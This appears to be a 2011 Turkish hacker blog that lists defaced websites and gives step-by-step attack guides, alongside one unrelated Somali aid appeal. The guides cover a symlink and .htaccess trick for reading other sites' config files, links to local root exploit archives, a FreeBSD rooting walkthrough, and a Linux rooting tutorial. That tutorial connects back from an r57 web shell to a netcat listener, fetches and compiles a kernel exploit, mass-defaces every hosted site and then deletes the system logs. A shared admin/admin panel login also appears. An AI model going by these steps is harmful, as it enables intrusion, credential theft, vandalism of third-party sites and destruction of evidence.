adnanpolat.com.tr Hacked
17 08 2011Site:
http://adnanpolat.com.tr/sayfa/iletisim/view.php?id=2
Zone:
http://by-h.org/wiev_mirr0r/?id=50594
http://legend-h.org/mirror/207178/adnanpolat.com.tr/sayfa/iletisim/view.php?id=2
http://zone-ar.com/attackmirror/mirror.php?id=274267
http://golgeler.net/view-%3E39
http://askeri-darbe.org/wiev_mirr0r/?id=88684
Yorumlar : Leave a Comment »
Kategoriler : Gövde Gösterisi
pekin2008.sabah.com.tr Hacked
15 08 2011Site
http://pekin2008.sabah.com.tr/
Zone:
http://www.golgeler.net/view-%3E20
http://k0-ka.in/attack/?id=34428
Yorumlar : 1 Comment »
Kategoriler : Gövde Gösterisi
Joomla Server Exploit Scanner
15 08 2011Serverdaki Joomla Dosyalarına Göre Exploit Buluyor…
Örnek ip : 193.194.64.87
http://mario.ayazoglu.org/joomlafinder.php
[img]http://www.hizliupload.com/di-DCWW.jpg[/img]
[img]http://www.hizliupload.com/di-JFB4.jpg[/img]
Yorumlar : Leave a Comment »
Kategoriler : Script
Symlink Forbidden Bypass
15 08 2011Selamın Aleyküm.
Gün gelmediki ln -s ile çektiğimiz configler bize forbidden vermedi.. Başımıza dert olan bizi zorlayan durumlardan biridir. Bazen eval kodları bile işe yaramaz. Öyle durumlarda kullanılabilecek bi yolu anlatacağım şimdi.
safe mode on ise işe yarar.
komut satırına :
mkdir mario
yazıyosunuz. siz istediğinizi yazın ben genelde mario klasörünü kullanırım 🙂
sonra shellden /mario yazıyosunuz ve mario dizinine giriyosunuz.
touch .htaccess
diyosunuz ve boş bi .htaccess dosyası açıyosunuz. sonra edit yaparak içine
.htaccess
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
kaydediyosunuz. sonra bu dizindeyken
ln -s /home/kullanıcıadı/public_html 1.txt
yapıyosunuz ve shellyolu/mario/1.txt dediğinizde sitenin tüm dosyalarını karşınızda görüyosunuz. sonrada ordan config dosyasına tıklıyosunuz ve bilgiler karşınızda 🙂
kolay gelsin 🙂
Yorumlar : Leave a Comment »
Kategoriler : Hack and Security
Staler Panel
13 08 2011http://blackcode.comule.com/index.php
admin
admin
Yorumlar : Leave a Comment »
Kategoriler : Password
Somaliye Türk yardımı gitti Yardım Etmek isteyenler lütfen kulak verin.
9 08 2011Somali’ye Türk yardımı gitti. tümoperatörlerden göndereğiniz 1 SMS ile 5 liralık Yardımda Bulunun…
Afrika, son 60 yılın en büyük kuraklık ve kıtlık tehlikesini yaşıyor. Yalnızca Somali’de 5milyon insan ölüm sınırında. Türkiye, bu kez de elini her 6 dakikada bir çocuğun hayatını kaybettiği Afrika kıtasındaki ülkelere uzattı. Ramazanın da getirdiğimanevi etkiyle yardımkuruluşlarının kampanyalarına katılım bu kez çok daha yüksek oldu. Vatandaşlar, tümoperatörlerden gönderecekleri bir SMS ile 5 liralık yardımda bulunabileceği gibi, 200 lira bağışlayanlar 5 kişilik bir ailenin bir aylık tüm gıda ihtiyaçlarını karşılamış olacak. Günde 3 SMS’in bir günlük fitreye denk geldiği açıklandı. Bu arada TOBB Afrika’ya 1 milyon liralık nakdi yardımyaptı. Diyanet İşleri Başkanı Mehmet Görmez, ‘’Her Evden Bir Fitre, Bir İftar Afrika’ya’’ kampanyasında SMS sayısının 1milyona ulaştığını söyledi. Başbakan Erdoğan imzasıyla yayınlanan genelge ile Afrika’ya yardımkampanyasının ulusal koordinasyonu Başbakanlık Afet ve Acil DurumYönetimi Başkanlığı’na (AFAD) verildi. Diyanet İşleri Başkanlığı, TİKA ve Türk Kızılayı’nın yürüttüğü kampanya kapsamında yardımmalzemelerini taşıyan Türk Hava Yolları’na (THY) ait ilk kargo uçakları dünMogadişu’ya gönderildi. Kargo uçaklarında, yaklaşık 1500 ailenin ihtiyacını karşılayacak 50 tonluk yardım malzemesi bulunuyor. Bir ailenin bir aylık ihtiyacını karşılayacak şekilde paketlenen her bir kolide çocukmaması, süt tozu ve bebek bisküvisi ile makarna, pirinç, mercimek, nohut, fasulye, yağ, şeker, un gibi gıda malzemelerinin yanı sıra, temizlik ve sağlık malzemeleri de yer alıyor. Somali’ye 10 ton ilaç ve tıbbimalzeme de gönderildi.
6 DAKİKADA BİR ÇOCUK ÖLÜYOR
Törende konuşan Başbakan Yardımcısı Bekir Bozdağ, “Dünyanın neresinde olursa olsun eğer açlık, kıtlık, yoksulluk, gözyaşı, kan varsa başka hiçbir ülkenin veya bunlardan uzak olan ülkelerin ‘bana ne’ deme hakkı ve lüksü olamaz. Yaşanan bir insanlık ayıbıdır. Bu ayıbın ortakları da bütün insanlıktır. O nedenle bu ayıbı bütün insanlık olarak el ele vermek suretiyle ortadan kaldırabiliriz’’ dedi. Sağlık Bakanı Recep Akdağ da, “Yanı başında açlıktan ya da susuzluktan derisi pörsümüş bir biçimde bir çocuğunun kaybını çaresiz takip eden bir anneyi, babayı düşünün bu tahammül edilecek bir durumdeğil. Hepimiz, bütün dünya üstüne düşeni yapmalıdır’’ diye konuştu. Diyanet İşleri Başkanı Prof. Dr. Mehmet Görmez ise şunları söyledi: “Altlarından petrol fışkıran dost ve kardeş İslamülkelerinin yöneticilerine, şu soruyu sormak istiyorum: Son 3 ayda açlıktan ölen 23 binMüslüman çocuğun bizMüslümanlar ve İslamâlemi olarak hesabını Yüce Rabbimize nasıl vereceğiz?”
200 liralık yardım bir aileye bir ay yetiyor
“Afrika için iyilik kandilleri yakalım” çağrısında bulunan Kızılay’ın kampanyasına 200 liralık bağışla katılan vatandaşlar, 5 kişilik ailenin bir aylık gıda ihtiyacını karşılamış olacak. Diyanet de “fitrelerinizi Afrika’ya gönderin” çağrısında bulunuyor. Bunun için operatörlerden AFRIKA yazıp 5601’e göndermek yeterli. Bir SMS 5 lira. Üç SMS gönderildiğinde bir fitre karşılanmış oluyor. Başbakan Erdoğan imzasıyla yayınlanan genelge ile Afrika’ya yardım kampanyasının ulusal koordinasyonu Başbakanlık Afet ve Acil Durum Yönetimi Başkanlığı (AFAD) tarafından yerine getiriliyor. Başbakanlık, dün akşam itibariyle toplanan yardım miktarının19 milyon 673 bin 124 lira olduğunu açıkladı.
BANKA HESAP NUMARALARI
Başbakanlık genelgesine göre yardım kampanyası banka hesap numaraları şöyle:
-T.C. ZİRAAT BANKASI AŞAĞI AYRANCI ŞUBESİ
TL hesap no (IBAN): TR940001000820555555555001
ABD Doları hesap no (IBAN): TR670001000820555555555002
EURO hesap no(IBAN): TR400001000820555555555003 Banka swift kod no: TCZBTR2A
-T. VAKIFLAR BANKASI A.O. FİNANS MARKET ŞUBESİ
TL hesap no (IBAN): TR800001500158007299038012
ABD Doları hesap no (IBAN): TR680001500158048012989557
EURO hesap no (IBAN): TR140001500158048012989559 Banka swift kod no: TVBATR2A
-T. HALK BANKASI BAKANLIKLAR ŞUBESİ
TL hesap no (IBAN): TR460001200940800005000014
ABD Doları hesap no (IBAN): TR590001200940800058000095
EURO hesap no (IBAN): TR320001200940800058000096 Banka swift kod no: TRHBTR2A
Somali yardımı vergiden düşecek
Bakanlar Kurulu’nda dün Somali’ye yapılacak yardımların vergiden düşürülmesi kararı alındı. Başbakan Yardımcısı Bülent Arınç, kurumlar ve Başbakanlık aracılığıyla makbuz karşılığı ayni ve nakdi yardımların vergi matrahından düşürülmesi için Bakanlar Kurulu kararının imzaya açıldığını bildirdi. Arınç, “Somali ve diğer ülkelere bugüne kadar yapılan yardımların süratle sevk edilmesi ve bundan sonraki yardımlardan vergi alınmaması kararı alınmıştır” dedi. Öte yandan TBMM Başkanlığı da, Afrika’da açlıklamücadele edenlere yardım amacıyla bir kampanya başlattı
Yorumlar : Leave a Comment »
Kategoriler : Genel
Local Root Exploits
6 08 20112.6.5-2009 Local Root Exploits
2.6.9-2009
2.6.10-2009
2.6.11-2009
2.6.12-2009
2.6.17-2009
2.6.18-2009
2.6.27-2009
FreeBSD 4.4 – 4.6
FreeBSD 4.8
Freedbs 5.3
Mac OS X
SunOS 5.7
SunOS 5.8
SunOS 5.9
SunOS 5.10
http://www.indirdur.net/files/0ATPPRDC/exploits.rar
http://www.indirdur.net/files/GNZS640Q/local-root-exploit-priv9.rar
http://rapidshare.com/files/291064859/LoCaL_RoOt_PrIv8.rar
resimler
http://i36.tinypic.com/289a22w.png
http://img299.yukle.tc/images/4980exp.jpg
2.6.18 Local Root Exploits
http://www.indirdur.net/files/QWDNAJZY/2.6.18
2.6.17 Local Root Exploits
http://www.indirdur.net/files/0BNOPNHP/2.6.17
2.6.28 Local Root Exploits
http://www.indirdur.net/files/7DPNKZ4D/2.6.28.c
FreeBSD 7.2
http://securityreason.com/expldownload/1/7375
FreeBSD 6.4
http://securityreason.com/expldownload/1/7374
2.6.18.20
http://www.exploit-db.com/exploits/10613
2.6.18.92
Yorumlar : 1 Comment »
Kategoriler : Exploits
FreeBsd Root Olalım
6 08 2011Zamanla Kullanmaya Başlayacağımız BsdSistem Root Olmak Ve Exploit Çalıştırma Hakkında Bilgi Vermek İstiyorum…
Öncelikle bu dökümanı eski version BSD‘ler için yazıyorum yeni sürüm BSD‘ler de böyle bir problem yok bilmenizde fayda var…
Öncelikle BC(Back Connect) alıyoruz Sonra Console’dan Bir Kaç Deneme Komutu Giriyoruz Örnek Vermek Gerekirse;
uname -a
Yukarıda belirttiğimiz komut bilindiği üzere sistemin şeklini şemalini versionunu gösterir direkt root meselesine atlıyalım hemen;
cd /tmp
/tmp dizinine geldik şimdi upload zamanı
fetch http://site.com/exp
exploiti upload ettikden sonra yetki verelim
chmod +x exp
artık yapmamız gereken tek şey;
./exp
id
Ve sonrası sonuç belli olacaktır Doğru Sürümlerde Doğru Kerneller Kullanmanız Dileğiyle…
Yorumlar : 1 Comment »
Kategoriler : Hack and Security
Linux Server Rooting (resimli)
6 08 2011Gerekli olan malzemeler
-netcat
-shell (r57 önerilir)
-mass.pl
-zoneh.pl
-Bir adet index
Öncelikle netcat programının windows versiyonunu google dan bulup indirin ve “C”Klasörüne kopyalayın modeminizinde istediğiniz portunu açın forumda modeminizin nasıl portu açılacağını başka bir arkadaş anlatmıştı ondan dolayı anlatmıyorum
Netcat ve portumuzu ayarladık(ben:8888 portunu kullanacagım)
Başlat->çalıştır->cmd yazıp enterlıyoruz.Buraya nc -vv -l -p 8888 yazıyoruz ve alttaki resim karşımıza geliyor
Şimd, r57 attgımızı siteye gelip r57 sayfasının en alt kısmına geliyoruz ve resimki yeri buluyoruz
Burdaki 11457yi 8888 olarka değiştirip connecte tıklıyoruz ve bağlantıyı gerçekleştiriyoruz.
Şimdi aşağıdaki resimki gibi bağlandık
Burdada görüyoruzki serverımızın sürümü:
Linux nexus.arazel.com 2.6.9-34.EL #1 Wed Mar 8 00:07:35 CST 2006 i686 i686 i38
GNU/Linux
Şimdi buna uygun linux kernel local root exploit arayacagız.milw0rm.coma girip aratıyoruz ve karşımıza exploitler geliyor.
http://www.milw0rm.com/exploits/2005
İşte kullanacagımız, serverımıza uygun local root exploit.Ama bu .c dilinde.Bunu notepade kaydedip daha sonra uzantısını .c olarka değiştiriyoruz
Evet üsttede göründüğü gibi ben 2.6.x.c olarak kaydettim.
Şimdi bunu serverımıza upload edelim ve derleyelim.
2.6.x.c yi ben http://parkbulvar.net/2.6.x.c olarak kendi siteme upload ettim.
Şimdi wget komutu ile benim siteden bu exploiti server’a çekelim(üstteki resim)
wget http://parkbulvar.net/2.6.x.c
eget saved dedi ve işlem tamam.Şimdi bu .c exploiti derleyeceğiz
üstteki resimde göründüğü gibi derleyelim.
Yani gcc -o root 2.6.x.c yapıyoruz.Şimdi exploitimiz derlendi ve root adını aldı.Bu root adlı derlenmiş exploite full yetki verelim;
chmod 777 root
Şimdi bu derlenmiş exploiti çalışıtralım
üstteki resimde exploitimizi çalıştırdık.Yani
./root -> exploiti çalıştırma
daha sorna id yazarak serverdaki durumumuzu öğrenelim.
eger resimdeki gibi uid:0(root) yazıyorsa.Exploit işe yaradı, server rootlandı demektir.Resimdede oldugu gibi serverı rootladık.Şimdi tüm siteleri deface edeceğiz.Serverdaki siteleri whois çekerek bakabilirizWhois’te 2 site gözüküyor.Napalım şansızlık
Eger whoiste domain adları yoksa ve serverdada belli değilse domain adları bakmanız gerekn yerler şuralardır.
/var/cpanel
/etc/httpd/conf/httpd.conf
etc/shadow
/var/named
Büyük ihtimalle burdaki yerlerden birinde domain adları mevcuttur.
Şimdi bizde control edelim
cd /var/named yazarak bu dizine geçiyoruz
ve ls yazarak bu dizindeki dosyaları listeliyoruz
İşte karşınızda domain isimleri.Sadece sonraki .db kısımlarını silmeniz yeterlidir.
arazel.com
brguild.com
brguild.org
clan-forsaken.com
danielhiggins.com
delucaspizzeria.com
dontknow.com
excessive-gaming.net
greyedge.com
houseforsaken.com
jeweladdict.com
keanpride.org
kindred192.com
mybox.mybox.com
named.ca
phosaigonexpress.com
webdetailing.com
Domainlerimiz üstte , şimdi bunu domain.txt olarak kaydediyoruz ve bir kenarda bekletiyoruz
Tüm siteleri deface etmek için mass.pl gereklidir. Ben size konuyla birlikte vereceğim.Şimdi mass.pl yi en başta r57.php attıgımız dizine upload ediyoruz.
perl mass.pl yazarak kullanımı karşımıza geliyor
example: perl mass.pl /tmp/index.html yazmış.
Bu şu demektir… /tmp/index.html -> burdaki indexi tüm klasörlere kopyala.
Burdaki /tmp dizini zorunlu değildir.Ben r57nin bulundugu dizini kullanacagım.
perl mass.pl /home/clanfo/domains/clan-forsaken.com/public_html/memberdb/admin/index.html
Resimdede oldugu gibi tüm siteler defacing ediliyor.
Bir kaç dakika sonra sitelerde indexini göreceksinizdir.
Şimdi sıra geldi zone-h almaya.zoneh.pl yi perl’inizin kurulu oldugu dizinde perl->bin-> buraya atıyorsunuz.
Şimdi başlat->çalıştır->cmd diyoruz ve burdan perl’in kurulu oldugunu dizinde perl->bin buraya geliyorsunuz.
Üst dizine çıkmak için cd.. , dizine girmek içi cd [dizin-adı] yapıcaksınız.
Buraya gelince perl zoneh.pl diyince kullanımını görelim
kullanımı: perl zoneh.pl <liste adı.txt> <ad>
Yukarda serverdaki siteleri bir txt yapıp kaydetmiştik.Onu zoneh.pl nin oldugu dizine atıyoruz ve;
perl zoneh.pl domain.txt xoron
yazıp enterlıyoruz ve eklendiğine bakıyoruz
EVET İNDEXİMİ ATILMIŞ.
SİTELERİ İNDEXLERKEN KULLANDIGIMIZ MASS.PL LOGLARI SİLECEKTİR AMA SİZ GENEDE AŞAĞIDAKİ KODLARI KULLANARAK LOGLARINIZI SERVERDAN SİLİN
rm – rf /var/log
rm – rf /var/adm
find/- name .bash_logout – exec rm – rf {} \;
find/- name *.log – exec rm – rf {} \;
Yorumlar : 1 Comment »
Kategoriler : Hack and Security
Mario Resmi Web Sitesi 